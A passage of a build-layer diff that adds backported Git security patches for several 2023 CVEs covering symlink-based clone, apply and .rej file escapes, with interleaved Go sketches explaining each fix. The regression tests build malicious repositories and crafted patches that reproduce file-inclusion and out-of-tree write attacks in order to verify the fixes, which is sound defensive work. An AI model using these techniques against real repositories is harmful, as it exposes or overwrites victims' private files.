+also contains an embedded stub repository which is the target of a
+symbolic link at the local path corresponding to the "sub" repository on
+disk (i.e., there is a symbolic link at "http:/127.0.0.1/dumb/sub.git",
+pointing to the stub repository via ".git/modules/sub/../../../repo").
+
+This stub repository fools Git into thinking that a local repository
+exists at that URL and thus can be cloned locally. The affected call is
+in `get_repo_path()`, which in turn calls `get_repo_path_1()`, which
+locates a valid repository at that target.
+
+This then causes Git to set the `is_local` variable to "1", and in turn
+instructs Git to clone the repository using its local clone optimization
+via the `clone_local()` function.
+
+The exploit comes into play because the stub repository's top-level
+"$GIT_DIR/objects" directory is a symbolic link which can point to an
+arbitrary path on the victim's machine. `clone_local()` resolves the
+top-level "objects" directory through a `stat(2)` call, meaning that we
+read through the symbolic link and copy or hardlink the directory
+contents at the destination of the link.
+
+In other words, we can get steps (1) and (3) to disagree by leveraging
+the dangling symlink to pick a non-local transport in the first step,
+and then set is_local to "1" in the third step when cloning with
+`--separate-git-dir`, which makes the symlink non-dangling.
+
+This can result in data-exfiltration on the victim's machine when
+sensitive data is at a known path (e.g., "/home/$USER/.ssh").
+
+The appropriate fix is two-fold:
+
+ - Resolve the transport later on (to avoid using the local
+ clone optimization with a non-local transport).
+
+ - Avoid reading through the top-level "objects" directory when
+ (correctly) using the clone_local() optimization.
+
+This patch merely demonstrates the issue. The following two patches will
+implement each part of the above fix, respectively.
+
+[^1]: Provided that any target directory does not contain symbolic
+ links, in which case the changes from 6f054f9 (builtin/clone.c:
+ disallow `--local` clones with symlinks, 2022-07-28) will abort the
+ clone.
+
+Reported-by: yvvdwf <yvvdwf@gmail.com>
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/58325b93c5b6212697b088371809e9948fee8052]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t5619-clone-local-ambiguous-transport.sh | 63 ++++++++++++++++++++++
+ 1 file changed, 63 insertions(+)
+ create mode 100644 t/t5619-clone-local-ambiguous-transport.sh
+
+diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
+new file mode 100644
+index 0000000..7ebd31a
+--- /dev/null
++++ b/t/t5619-clone-local-ambiguous-transport.sh
+@@ -0,0 +1,63 @@
++#!/bin/sh
++
++test_description='test local clone with ambiguous transport'
++
++. ./test-lib.sh
++. "$TEST_DIRECTORY/lib-httpd.sh"
++
++if ! test_have_prereq SYMLINKS
++then
++ skip_all='skipping test, symlink support unavailable'
++ test_done
++fi
++
++start_httpd
++
++REPO="$HTTPD_DOCUMENT_ROOT_PATH/sub.git"
++URI="$HTTPD_URL/dumb/sub.git"
++
++test_expect_success 'setup' '
++ mkdir -p sensitive &&
++ echo "secret" >sensitive/secret &&
++
++ git init --bare "$REPO" &&
++ test_commit_bulk -C "$REPO" --ref=main 1 &&
++
++ git -C "$REPO" update-ref HEAD main &&
++ git -C "$REPO" update-server-info &&
++
++ git init malicious &&
++ (
++ cd malicious &&
++
++ git submodule add "$URI" &&
++
++ mkdir -p repo/refs &&
++ touch repo/refs/.gitkeep &&
++ printf "ref: refs/heads/a" >repo/HEAD &&
++ ln -s "$(cd .. && pwd)/sensitive" repo/objects &&
++
++ mkdir -p "$HTTPD_URL/dumb" &&
++ ln -s "../../../.git/modules/sub/../../../repo/" "$URI" &&
++
++ git add . &&
++ git commit -m "initial commit"
++ ) &&
++
++ # Delete all of the references in our malicious submodule to
++ # avoid the client attempting to checkout any objects (which
++ # will be missing, and thus will cause the clone to fail before
++ # we can trigger the exploit).
++ git -C "$REPO" for-each-ref --format="delete %(refname)" >in &&
++ git -C "$REPO" update-ref --stdin <in &&
++ git -C "$REPO" update-server-info
++'
++
++test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
++ git clone malicious clone &&
++ git -C clone submodule update --init &&
++
++ test_path_is_missing clone/.git/modules/sub/objects/secret
++'
++
++test_done
+--
+2.25.1
+
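The exploit described above depends on a symlink that is dangling when the transport is chosen but has a valid target by the time `is_local` is computed, because `--separate-git-dir` creates the target directory in between. A small Go sketch of that state change (hypothetical paths; not git's clone code):

```
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// exists follows symlinks, like the stat() used by get_repo_path().
func exists(p string) bool {
	_, err := os.Stat(p)
	return err == nil
}

func main() {
	dir, _ := os.MkdirTemp("", "demo")
	defer os.RemoveAll(dir)

	link := filepath.Join(dir, "http:", "127.0.0.1", "dumb", "sub.git")
	target := filepath.Join(dir, "modules", "sub", "repo")

	os.MkdirAll(filepath.Dir(link), 0o755)
	os.Symlink(target, link)

	fmt.Println("before:", exists(link)) // false: dangling, so it looks remote

	os.MkdirAll(target, 0o755)          // e.g. --separate-git-dir creates it
	fmt.Println("after:", exists(link)) // true: now it looks like a local repo
}
```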
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
new file mode 100644
index 0000000000..0b5b40f827
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-2.patch
@@ -0,0 +1,122 @@
+From cf8f6ce02a13f4d1979a53241afbee15a293fce9 Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:48 -0500
+Subject: [PATCH 2/3] clone: delay picking a transport until after get_repo_path()
+
+In the previous commit, t5619 demonstrates an issue where two calls to
+`get_repo_path()` could trick Git into using its local clone mechanism
+in conjunction with a non-local transport.
+
+That sequence is:
+
+ - the starting state is that the local path https:/example.com/foo is a
+ symlink that points to ../../../.git/modules/foo. So it's dangling.
+
+ - get_repo_path() sees that no such path exists (because it's
+ dangling), and thus we do not canonicalize it into an absolute path
+
+ - because we're using --separate-git-dir, we create .git/modules/foo.
+ Now our symlink is no longer dangling!
+
+ - we pass the url to transport_get(), which sees it as an https URL.
+
+ - we call get_repo_path() again, on the url. This second call was
+ introduced by f38aa83 (use local cloning if insteadOf makes a
+ local URL, 2014-07-17). The idea is that we want to pull the url
+ fresh from the remote.c API, because it will apply any aliases.
+
+And of course now it sees that there is a local file, which is a
+mismatch with the transport we already selected.
+
+The issue in the above sequence is calling `transport_get()` before
+deciding whether or not the repository is indeed local, and not passing
+in an absolute path if it is local.
+
+This is reminiscent of a similar bug report in [1], where it was
+suggested to perform the `insteadOf` lookup earlier. Taking that
+approach may not be as straightforward, since the intent is to store the
+original URL in the config, but to actually fetch from the insteadOf
+one, so conflating the two early on is a non-starter.
+
+Note: we pass the path returned by `get_repo_path(remote->url[0])`,
+which should be the same as `repo_name` (aside from any `insteadOf`
+rewrites).
+
+We *could* pass `absolute_pathdup()` of the same argument, which
+86521ac (Bring local clone's origin URL in line with that of a remote
+clone, 2008-09-01) indicates may differ depending on the presence of
+".git/" for a non-bare repo. That matters for forming relative submodule
+paths, but doesn't matter for the second call, since we're just feeding
+it to the transport code, which is fine either way.
+
+[1]: https://lore.kernel.org/git/CAMoD=Bi41mB3QRn3JdZL-FGHs4w3C2jGpnJB-CqSndO7FMtfzA@mail.gmail.com/
+
+Signed-off-by: Jeff King <peff@peff.net>
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/cf8f6ce02a13f4d1979a53241afbee15a293fce9]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ builtin/clone.c | 8 ++++----
+ t/t5619-clone-local-ambiguous-transport.sh | 15 +++++++++++----
+ 2 files changed, 15 insertions(+), 8 deletions(-)
+
+diff --git a/builtin/clone.c b/builtin/clone.c
+index 53e04b1..b57e703 100644
+--- a/builtin/clone.c
++++ b/builtin/clone.c
+@@ -1112,10 +1112,6 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
+ branch_top.buf);
+ refspec_append(&remote->fetch, default_refspec.buf);
+
+- transport = transport_get(remote, remote->url[0]);
+- transport_set_verbosity(transport, option_verbosity, option_progress);
+- transport->family = family;
+-
+ path = get_repo_path(remote->url[0], &is_bundle);
+ is_local = option_local != 0 && path && !is_bundle;
+ if (is_local) {
+@@ -1135,6 +1131,10 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
+ }
+ if (option_local > 0 && !is_local)
+ warning(_("--local is ignored"));
++
++ transport = transport_get(remote, path ? path : remote->url[0]);
++ transport_set_verbosity(transport, option_verbosity, option_progress);
++ transport->family = family;
+ transport->cloning = 1;
+
+ transport_set_option(transport, TRANS_OPT_KEEP, "yes");
+diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
+index 7ebd31a..cce62bf 100644
+--- a/t/t5619-clone-local-ambiguous-transport.sh
++++ b/t/t5619-clone-local-ambiguous-transport.sh
+@@ -53,11 +53,18 @@ test_expect_success 'setup' '
+ git -C "$REPO" update-server-info
+ '
+
+-test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
++test_expect_success 'ambiguous transport does not lead to arbitrary file-inclusion' '
+ git clone malicious clone &&
+- git -C clone submodule update --init &&
+-
+- test_path_is_missing clone/.git/modules/sub/objects/secret
++ test_must_fail git -C clone submodule update --init 2>err &&
++
++ test_path_is_missing clone/.git/modules/sub/objects/secret &&
++ # We would actually expect "transport .file. not allowed" here,
++ # but due to quirks of the URL detection in Git, we mis-parse
++ # the absolute path as a bogus URL and die before that step.
++ #
++ # This works for now, and if we ever fix the URL detection, it
++ # is OK to change this to detect the transport error.
++ grep "protocol .* is not supported" err
+ '
+
+ test_done
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
new file mode 100644
index 0000000000..08fb7f840b
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
@@ -0,0 +1,154 @@
+From bffc762f87ae8d18c6001bf0044a76004245754c Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:51 -0500
+Subject: [PATCH 3/3] dir-iterator: prevent top-level symlinks without FOLLOW_SYMLINKS
+
+When using the dir_iterator API, we first stat(2) the base path, and
+then use that as a starting point to enumerate the directory's contents.
+
+If the directory contains symbolic links, we will immediately die() upon
+encountering them without the `FOLLOW_SYMLINKS` flag. The same is not
+true when resolving the top-level directory, though.
+
+As explained in a previous commit, this oversight in 6f054f9
+(builtin/clone.c: disallow `--local` clones with symlinks, 2022-07-28)
+can be used as an attack vector to include arbitrary files on a victim's
+filesystem from outside of the repository.
+
+Prevent resolving top-level symlinks unless the FOLLOW_SYMLINKS flag is
+given, which will cause clones of a repository with a symlink'd
+"$GIT_DIR/objects" directory to fail.
+
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/bffc762f87ae8d18c6001bf0044a76004245754c]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dir-iterator.c | 13 +++++++++----
+ dir-iterator.h | 5 +++++
+ t/t0066-dir-iterator.sh | 27 ++++++++++++++++++++++++++-
+ t/t5604-clone-reference.sh | 16 ++++++++++++++++
+ 4 files changed, 56 insertions(+), 5 deletions(-)
+
+diff --git a/dir-iterator.c b/dir-iterator.c
+index b17e9f9..3764dd8 100644
+--- a/dir-iterator.c
++++ b/dir-iterator.c
+@@ -203,7 +203,7 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
+ {
+ struct dir_iterator_int *iter = xcalloc(1, sizeof(*iter));
+ struct dir_iterator *dir_iterator = &iter->base;
+- int saved_errno;
++ int saved_errno, err;
+
+ strbuf_init(&iter->base.path, PATH_MAX);
+ strbuf_addstr(&iter->base.path, path);
+@@ -213,10 +213,15 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
+ iter->flags = flags;
+
+ /*
+- * Note: stat already checks for NULL or empty strings and
+- * inexistent paths.
++ * Note: stat/lstat already checks for NULL or empty strings and
++ * nonexistent paths.
+ */
+- if (stat(iter->base.path.buf, &iter->base.st) < 0) {
++ if (iter->flags & DIR_ITERATOR_FOLLOW_SYMLINKS)
++ err = stat(iter->base.path.buf, &iter->base.st);
++ else
++ err = lstat(iter->base.path.buf, &iter->base.st);
++
++ if (err < 0) {
+ saved_errno = errno;
+ goto error_out;
+ }
+diff --git a/dir-iterator.h b/dir-iterator.h
+index 0822915..e3b6ff2 100644
+--- a/dir-iterator.h
++++ b/dir-iterator.h
+@@ -61,6 +61,11 @@
+ * not the symlinks themselves, which is the default behavior. Broken
+ * symlinks are ignored.
+ *
++ * Note: setting DIR_ITERATOR_FOLLOW_SYMLINKS affects resolving the
++ * starting path as well (e.g., attempting to iterate starting at a
++ * symbolic link pointing to a directory without FOLLOW_SYMLINKS will
++ * result in an error).
++ *
+ * Warning: circular symlinks are also followed when
+ * DIR_ITERATOR_FOLLOW_SYMLINKS is set. The iteration may end up with
+ * an ELOOP if they happen and DIR_ITERATOR_PEDANTIC is set.
+diff --git a/t/t0066-dir-iterator.sh b/t/t0066-dir-iterator.sh
+index 92910e4..c826f60 100755
+--- a/t/t0066-dir-iterator.sh
++++ b/t/t0066-dir-iterator.sh
+@@ -109,7 +109,9 @@ test_expect_success SYMLINKS 'setup dirs with symlinks' '
+ mkdir -p dir5/a/c &&
+ ln -s ../c dir5/a/b/d &&
+ ln -s ../ dir5/a/b/e &&
+- ln -s ../../ dir5/a/b/f
++ ln -s ../../ dir5/a/b/f &&
++
++ ln -s dir4 dir6
+ '
+
+ test_expect_success SYMLINKS 'dir-iterator should not follow symlinks by default' '
+@@ -145,4 +147,27 @@ test_expect_success SYMLINKS 'dir-iterator should follow symlinks w/ follow flag
+ test_cmp expected-follow-sorted-output actual-follow-sorted-output
+ '
+
++test_expect_success SYMLINKS 'dir-iterator does not resolve top-level symlinks' '
++ test_must_fail test-tool dir-iterator ./dir6 >out &&
++
++ grep "ENOTDIR" out
++'
++
++test_expect_success SYMLINKS 'dir-iterator resolves top-level symlinks w/ follow flag' '
++ cat >expected-follow-sorted-output <<-EOF &&
++ [d] (a) [a] ./dir6/a
++ [d] (a/f) [f] ./dir6/a/f
++ [d] (a/f/c) [c] ./dir6/a/f/c
++ [d] (b) [b] ./dir6/b
++ [d] (b/c) [c] ./dir6/b/c
++ [f] (a/d) [d] ./dir6/a/d
++ [f] (a/e) [e] ./dir6/a/e
++ EOF
++
++ test-tool dir-iterator --follow-symlinks ./dir6 >out &&
++ sort out >actual-follow-sorted-output &&
++
++ test_cmp expected-follow-sorted-output actual-follow-sorted-output
++'
++
+ test_done
+diff --git a/t/t5604-clone-reference.sh b/t/t5604-clone-reference.sh
+index 4894237..615b981 100755
+--- a/t/t5604-clone-reference.sh
++++ b/t/t5604-clone-reference.sh
+@@ -354,4 +354,20 @@ test_expect_success SYMLINKS 'clone repo with symlinked or unknown files at obje
+ test_must_be_empty T--shared.objects-symlinks.raw
+ '
+
++test_expect_success SYMLINKS 'clone repo with symlinked objects directory' '
++ test_when_finished "rm -fr sensitive malicious" &&
++
++ mkdir -p sensitive &&
++ echo "secret" >sensitive/file &&
++
++ git init malicious &&
++ rm -fr malicious/.git/objects &&
++ ln -s "$(pwd)/sensitive" ./malicious/.git/objects &&
++
++ test_must_fail git clone --local malicious clone 2>err &&
++
++ test_path_is_missing clone &&
++ grep "failed to start iterator over" err
++'
++
+ test_done
+--
+2.25.1
+
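The dir-iterator change swaps `stat(2)` for `lstat(2)` on the starting path, so a symlinked "$GIT_DIR/objects" directory is refused up front unless FOLLOW_SYMLINKS was requested. The same distinction expressed in Go (illustrative only; the real change is the C shown above):

```
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
)

// beginIteration mimics dir_iterator_begin(): without followSymlinks the
// starting path itself must already be a directory, not a symlink to one.
func beginIteration(path string, followSymlinks bool) error {
	var fi os.FileInfo
	var err error
	if followSymlinks {
		fi, err = os.Stat(path) // resolves a symlinked root
	} else {
		fi, err = os.Lstat(path) // reports the symlink itself
	}
	if err != nil {
		return err
	}
	if !fi.IsDir() {
		return errors.New("not a directory")
	}
	return nil
}

func main() {
	dir, _ := os.MkdirTemp("", "iter")
	defer os.RemoveAll(dir)
	realDir := filepath.Join(dir, "real")
	alias := filepath.Join(dir, "alias")
	os.Mkdir(realDir, 0o755)
	os.Symlink(realDir, alias)
	fmt.Println(beginIteration(alias, false)) // not a directory
	fmt.Println(beginIteration(alias, true))  // <nil>
}
```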
diff --git a/meta/recipes-devtools/git/files/CVE-2023-23946.patch b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
new file mode 100644
index 0000000000..3629ff57b2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
@@ -0,0 +1,184 @@
+From fade728df1221598f42d391cf377e9e84a32053f Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 2 Feb 2023 11:54:34 +0100
+Subject: [PATCH] apply: fix writing behind newly created symbolic links
+
+When writing files git-apply(1) initially makes sure that none of the
+files it is about to create are behind a symlink:
+
+```
+ $ git init repo
+ Initialized empty Git repository in /tmp/repo/.git/
+ $ cd repo/
+ $ ln -s dir symlink
+ $ git apply - <<EOF
+ diff --git a/symlink/file b/symlink/file
+ new file mode 100644
+ index 0000000..e69de29
+ EOF
+ error: affected file 'symlink/file' is beyond a symbolic link
+```
+
+This safety mechanism is crucial to ensure that we don't write outside
+of the repository's working directory. It can be fooled though when the
+patch that is being applied creates the symbolic link in the first
+place, which can lead to writing files in arbitrary locations.
+
+Fix this by checking whether the path we're about to create is
+beyond a symlink or not. Tightening these checks like this should be
+fine as we already have these precautions in Git as explained
+above. Ideally, we should update the check we do up-front before
+starting to reflect the computed changes to the working tree so that
+we catch this case as well, but as part of embargoed security work,
+adding an equivalent check just before we try to write out a file
+should serve us well as a reasonable first step.
+
+Digging back into history shows that this vulnerability has existed
+since at least Git v2.9.0. As Git v2.8.0 and older don't build on my
+system anymore I cannot tell whether older versions are affected, as
+well.
+
+Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/fade728df1221598f42d391cf377e9e84a32053f]
+CVE: CVE-2023-23946
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ apply.c | 27 ++++++++++++++
+ t/t4115-apply-symlink.sh | 81 ++++++++++++++++++++++++++++++++++++++++
+ 2 files changed, 108 insertions(+)
+
+diff --git a/apply.c b/apply.c
+index f8a046a..4f303bf 100644
+--- a/apply.c
++++ b/apply.c
+@@ -4373,6 +4373,33 @@ static int create_one_file(struct apply_state *state,
+ if (state->cached)
+ return 0;
+
++ /*
++ * We already try to detect whether files are beyond a symlink in our
++ * up-front checks. But in the case where symlinks are created by any
++ * of the intermediate hunks it can happen that our up-front checks
++ * didn't yet see the symlink, but at the point of arriving here there
++ * in fact is one. We thus repeat the check for symlinks here.
++ *
++ * Note that this does not make the up-front check obsolete as the
++ * failure mode is different:
++ *
++ * - The up-front checks cause us to abort before we have written
++ * anything into the working directory. So when we exit this way the
++ * working directory remains clean.
++ *
++ * - The checks here happen in the middle of the action where we have
++ * already started to apply the patch. The end result will be a dirty
++ * working directory.
++ *
++ * Ideally, we should update the up-front checks to catch what would
++ * happen when we apply the patch before we damage the working tree.
++ * We have all the information necessary to do so. But for now, as a
++ * part of embargoed security work, having this check would serve as a
++ * reasonable first step.
++ */
++ if (path_is_beyond_symlink(state, path))
++ return error(_("affected file '%s' is beyond a symbolic link"), path);
++
+ res = try_create_file(state, path, mode, buf, size);
+ if (res < 0)
+ return -1;
+diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
+index 872fcda..1acb7b2 100755
+--- a/t/t4115-apply-symlink.sh
++++ b/t/t4115-apply-symlink.sh
+@@ -44,4 +44,85 @@ test_expect_success 'apply --index symlink patch' '
+
+ '
+
++test_expect_success 'symlink setup' '
++ ln -s .git symlink &&
++ git add symlink &&
++ git commit -m "add symlink"
++'
++
++test_expect_success SYMLINKS 'symlink escape when creating new files' '
++ test_when_finished "git reset --hard && git clean -dfx" &&
++
++ cat >patch <<-EOF &&
++ diff --git a/symlink b/renamed-symlink
++ similarity index 100%
++ rename from symlink
++ rename to renamed-symlink
++ --
++ diff --git /dev/null b/renamed-symlink/create-me
++ new file mode 100644
++ index 0000000..039727e
++ --- /dev/null
++ +++ b/renamed-symlink/create-me
++ @@ -0,0 +1,1 @@
++ +busted
++ EOF
++
++ test_must_fail git apply patch 2>stderr &&
++ cat >expected_stderr <<-EOF &&
++ error: affected file ${SQ}renamed-symlink/create-me${SQ} is beyond a symbolic link
++ EOF
++ test_cmp expected_stderr stderr &&
++ ! test_path_exists .git/create-me
++'
++
++test_expect_success SYMLINKS 'symlink escape when modifying file' '
++ test_when_finished "git reset --hard && git clean -dfx" &&
++ touch .git/modify-me &&
++
++ cat >patch <<-EOF &&
++ diff --git a/symlink b/renamed-symlink
++ similarity index 100%
++ rename from symlink
++ rename to renamed-symlink
++ --
++ diff --git a/renamed-symlink/modify-me b/renamed-symlink/modify-me
++ index 1111111..2222222 100644
++ --- a/renamed-symlink/modify-me
++ +++ b/renamed-symlink/modify-me
++ @@ -0,0 +1,1 @@
++ +busted
++ EOF
++
++ test_must_fail git apply patch 2>stderr &&
++ cat >expected_stderr <<-EOF &&
++ error: renamed-symlink/modify-me: No such file or directory
++ EOF
++ test_cmp expected_stderr stderr &&
++ test_must_be_empty .git/modify-me
++'
++
++test_expect_success SYMLINKS 'symlink escape when deleting file' '
++ test_when_finished "git reset --hard && git clean -dfx && rm .git/delete-me" &&
++ touch .git/delete-me &&
++
++ cat >patch <<-EOF &&
++ diff --git a/symlink b/renamed-symlink
++ similarity index 100%
++ rename from symlink
++ rename to renamed-symlink
++ --
++ diff --git a/renamed-symlink/delete-me b/renamed-symlink/delete-me
++ deleted file mode 100644
++ index 1111111..0000000 100644
++ EOF
++
++ test_must_fail git apply patch 2>stderr &&
++ cat >expected_stderr <<-EOF &&
++ error: renamed-symlink/delete-me: No such file or directory
++ EOF
++ test_cmp expected_stderr stderr &&
++ test_path_is_file .git/delete-me
++'
++
+ test_done
+--
+2.25.1
+
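The fix re-checks, immediately before each file is created, that no parent component of the target path is a symbolic link, since an earlier hunk in the same patch may have introduced one. A Go sketch of such a parent-component walk (the helper below is hypothetical; apply.c reuses its existing path_is_beyond_symlink()):

```
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// pathIsBeyondSymlink reports whether any parent directory component of a
// path is currently a symbolic link on disk (relative paths only, for
// brevity).
func pathIsBeyondSymlink(path string) bool {
	parts := strings.Split(filepath.ToSlash(filepath.Clean(path)), "/")
	for i := 1; i < len(parts); i++ {
		parent := filepath.Join(parts[:i]...)
		fi, err := os.Lstat(parent)
		if err == nil && fi.Mode()&os.ModeSymlink != 0 {
			return true
		}
	}
	return false
}

func main() {
	os.Symlink(".git", "renamed-symlink")
	defer os.Remove("renamed-symlink")
	fmt.Println(pathIsBeyondSymlink("renamed-symlink/create-me")) // true
	fmt.Println(pathIsBeyondSymlink("normal-dir/create-me"))      // false
}
```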
diff --git a/meta/recipes-devtools/git/files/CVE-2023-25652.patch b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
new file mode 100644
index 0000000000..d6b17a2b8a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
@@ -0,0 +1,94 @@
+From 9db05711c98efc14f414d4c87135a34c13586e0b Mon Sep 17 00:00:00 2001
+From: Johannes Schindelin <johannes.schindelin@gmx.de>
+Date: Thu, 9 Mar 2023 16:02:54 +0100
+Subject: [PATCH] apply --reject: overwrite existing `.rej` symlink if it
+ exists
+
+The `git apply --reject` is expected to write out `.rej` files in case
+one or more hunks fail to apply cleanly. Historically, the command
+overwrites any existing `.rej` files. The idea being that
+apply/reject/edit cycles are relatively common, and the generated `.rej`
+files are not considered precious.
+
+But the command does not overwrite existing `.rej` symbolic links, and
+instead follows them. This is unsafe because the same patch could
+potentially create such a symbolic link and point at arbitrary paths
+outside the current worktree, and `git apply` would write the contents
+of the `.rej` file into that location.
+
+Therefore, let's make sure that any existing `.rej` file or symbolic
+link is removed before writing it.
+
+Reported-by: RyotaK <ryotak.mail@gmail.com>
+Helped-by: Taylor Blau <me@ttaylorr.com>
+Helped-by: Junio C Hamano <gitster@pobox.com>
+Helped-by: Linus Torvalds <torvalds@linuxfoundation.org>
+Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/9db05711c98efc14f414d4c87135a34c13586e0b]
+CVE: CVE-2023-25652
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ apply.c | 14 ++++++++++++--
+ t/t4115-apply-symlink.sh | 15 +++++++++++++++
+ 2 files changed, 27 insertions(+), 2 deletions(-)
+
+diff --git a/apply.c b/apply.c
+index 4f303bf..aa7111d 100644
+--- a/apply.c
++++ b/apply.c
+@@ -4531,7 +4531,7 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
+ FILE *rej;
+ char namebuf[PATH_MAX];
+ struct fragment *frag;
+- int cnt = 0;
++ int fd, cnt = 0;
+ struct strbuf sb = STRBUF_INIT;
+
+ for (cnt = 0, frag = patch->fragments; frag; frag = frag->next) {
+@@ -4571,7 +4571,17 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
+ memcpy(namebuf, patch->new_name, cnt);
+ memcpy(namebuf + cnt, ".rej", 5);
+
+- rej = fopen(namebuf, "w");
++ fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
++ if (fd < 0) {
++ if (errno != EEXIST)
++ return error_errno(_("cannot open %s"), namebuf);
++ if (unlink(namebuf))
++ return error_errno(_("cannot unlink '%s'"), namebuf);
++ fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
++ if (fd < 0)
++ return error_errno(_("cannot open %s"), namebuf);
++ }
++ rej = fdopen(fd, "w");
+ if (!rej)
+ return error_errno(_("cannot open %s"), namebuf);
+
+diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
+index 1acb7b2..2b034ff 100755
+--- a/t/t4115-apply-symlink.sh
++++ b/t/t4115-apply-symlink.sh
+@@ -125,4 +125,19 @@ test_expect_success SYMLINKS 'symlink escape when deleting file' '
+ test_path_is_file .git/delete-me
+ '
+
++test_expect_success SYMLINKS '--reject removes .rej symlink if it exists' '
++ test_when_finished "git reset --hard && git clean -dfx" &&
++
++ test_commit file &&
++ echo modified >file.t &&
++ git diff -- file.t >patch &&
++ echo modified-again >file.t &&
++
++ ln -s foo file.t.rej &&
++ test_must_fail git apply patch --reject 2>err &&
++ test_i18ngrep "Rejected hunk" err &&
++ test_path_is_missing foo &&
++ test_path_is_file file.t.rej
++'
++
+ test_done
+--
+2.25.1
+
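The fix opens the `.rej` file with `O_CREAT | O_EXCL` so a pre-existing symlink is never followed; on EEXIST the old entry is unlinked and the exclusive create retried. The equivalent pattern in Go (illustrative; apply.c does this with open(2)/fdopen(3)):

```
package main

import (
	"fmt"
	"os"
)

// createRejectFile never writes through an existing symlink: it creates the
// file exclusively and, if something already exists there, removes it and
// retries the exclusive create once.
func createRejectFile(name string) (*os.File, error) {
	flags := os.O_CREATE | os.O_EXCL | os.O_WRONLY
	f, err := os.OpenFile(name, flags, 0o666)
	if err == nil {
		return f, nil
	}
	if !os.IsExist(err) {
		return nil, err
	}
	if err := os.Remove(name); err != nil {
		return nil, err
	}
	return os.OpenFile(name, flags, 0o666)
}

func main() {
	os.Symlink("/tmp/should-not-be-written", "file.t.rej")
	f, err := createRejectFile("file.t.rej")
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	f.Close()
	fmt.Println("file.t.rej is now a fresh regular file, not a symlink")
	os.Remove("file.t.rej")
}
```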
diff --git a/meta/recipes-devtools/git/files/CVE-2023-29007.patch b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
new file mode 100644
index 0000000000..e166c01412
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
@@ -0,0 +1,159 @@
+From 057c07a7b1fae22fdeef26c243f4cfbe3afc90ce Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Fri, 14 Apr 2023 11:46:59 -0400
+Subject: [PATCH] Merge branch 'tb/config-copy-or-rename-in-file-injection'
+
+Avoids issues with renaming or deleting sections with long lines, where
+configuration values may be interpreted as sections, leading to
+configuration injection. Addresses CVE-2023-29007.
+
+* tb/config-copy-or-rename-in-file-injection:
+ config.c: disallow overly-long lines in `copy_or_rename_section_in_file()`
+ config.c: avoid integer truncation in `copy_or_rename_section_in_file()`
+ config: avoid fixed-sized buffer when renaming/deleting a section
+ t1300: demonstrate failure when renaming sections with long lines
+
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/528290f8c61222433a8cf02fb7cfffa8438432b4]
+CVE: CVE-2023-29007
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ config.c | 36 +++++++++++++++++++++++++-----------
+ t/t1300-config.sh | 30 ++++++++++++++++++++++++++++++
+ 2 files changed, 55 insertions(+), 11 deletions(-)
+
+diff --git a/config.c b/config.c
+index e7052b3..676b687 100644
